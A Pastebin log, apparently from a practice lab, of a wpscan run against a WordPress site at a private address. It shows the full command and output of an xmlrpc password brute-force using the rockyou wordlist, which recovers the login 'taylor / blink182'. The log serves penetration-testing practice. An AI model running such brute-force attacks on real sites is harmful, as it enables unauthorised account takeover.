Advertisement
Guest User

Untitled

a guest
Feb 9th, 2019
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.03 KB | None | 0 0
  1. phil@kali:~$ wpscan --url 192.168.1.207/development --max-threads 20 --passwords /usr/share/wordlists/rockyou.txt --usernames taylor
  2. _______________________________________________________________
  3. __ _______ _____
  4. \ \ / / __ \ / ____|
  5. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  6. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  7. \ /\ / | | ____) | (__| (_| | | | |
  8. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  9.  
  10. WordPress Security Scanner by the WPScan Team
  11. Version 3.4.3
  12. Sponsored by Sucuri - https://sucuri.net
  13. @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
  14. _______________________________________________________________
  15.  
  16. [i] Updating the Database ...
  17. [i] Update completed.
  18.  
  19. [+] URL: http://192.168.1.207/development/
  20. [+] Started: Sun Feb 10 12:33:53 2019
  21.  
  22. Interesting Finding(s):
  23.  
  24. [+] http://192.168.1.207/development/
  25. | Interesting Entries:
  26. | - Server: Apache/2.4.6 (CentOS) PHP/5.4.16
  27. | - X-Powered-By: PHP/5.4.16
  28. | Found By: Headers (Passive Detection)
  29. | Confidence: 100%
  30.  
  31. [+] http://192.168.1.207/development/xmlrpc.php
  32. | Found By: Direct Access (Aggressive Detection)
  33. | Confidence: 100%
  34. | References:
  35. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  36. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  37. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  38. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  39. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  40.  
  41. [+] http://192.168.1.207/development/readme.html
  42. | Found By: Direct Access (Aggressive Detection)
  43. | Confidence: 100%
  44.  
  45. [+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
  46. | Detected By: Rss Generator (Passive Detection)
  47. | - http://192.168.1.207/development/index.php/feed/, <generator>https://wordpress.org/?v=5.0.3</generator>
  48. | - http://192.168.1.207/development/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.0.3</generator>
  49.  
  50. [+] WordPress theme in use: twentynineteen
  51. | Location: http://192.168.1.207/development/wp-content/themes/twentynineteen/
  52. | Latest Version: 1.2 (up to date)
  53. | Last Updated: 2019-01-09T00:00:00.000Z
  54. | Readme: http://192.168.1.207/development/wp-content/themes/twentynineteen/readme.txt
  55. | Style URL: http://192.168.1.207/development/wp-content/themes/twentynineteen/style.css?ver=1.2
  56. | Style Name: Twenty Nineteen
  57. | Style URI: https://github.com/WordPress/twentynineteen
  58. | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
  59. | Author: the WordPress team
  60. | Author URI: https://wordpress.org/
  61. |
  62. | Detected By: Css Style (Passive Detection)
  63. |
  64. | Version: 1.2 (80% confidence)
  65. | Detected By: Style (Passive Detection)
  66. | - http://192.168.1.207/development/wp-content/themes/twentynineteen/style.css?ver=1.2, Match: 'Version: 1.2'
  67.  
  68. [+] Enumerating All Plugins
  69.  
  70. [i] No plugins Found.
  71.  
  72. [+] Enumerating Config Backups
  73. Checking Config Backups - Time: 00:00:04 <=================================================================================================================> (21 / 21) 100.00% Time: 00:00:04
  74.  
  75. [i] No Config Backups Found.
  76.  
  77. [+] Performing password attack on Xmlrpc against 1 user/s
  78. [SUCCESS] - taylor / blink182
  79. Trying taylor / 222222 Time: 00:01:07 <===================================================================================================================> (180 / 180) 100.00% Time: 00:01:07
  80.  
  81. [i] Valid Combinations Found:
  82. | Username: taylor, Password: blink182
  83.  
  84. [+] Finished: Sun Feb 10 12:35:17 2019
  85. [+] Requests Done: 252
  86. [+] Cached Requests: 4
  87. [+] Data Sent: 98.856 KB
  88. [+] Data Received: 22.798 MB
  89. [+] Memory used: 869.855 MB
  90. [+] Elapsed time: 00:01:24
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement